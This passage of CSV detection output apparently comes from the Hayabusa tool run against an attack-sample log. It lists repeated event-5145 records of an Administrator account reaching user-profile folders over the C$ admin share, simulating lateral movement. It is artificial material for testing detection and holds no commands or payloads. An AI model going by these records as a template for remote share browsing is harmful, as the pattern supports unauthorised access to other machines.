23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Contacts | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\Administrator\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\Administrator.EXAMPLE | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\Administrator.EXAMPLE\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\IEUser\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 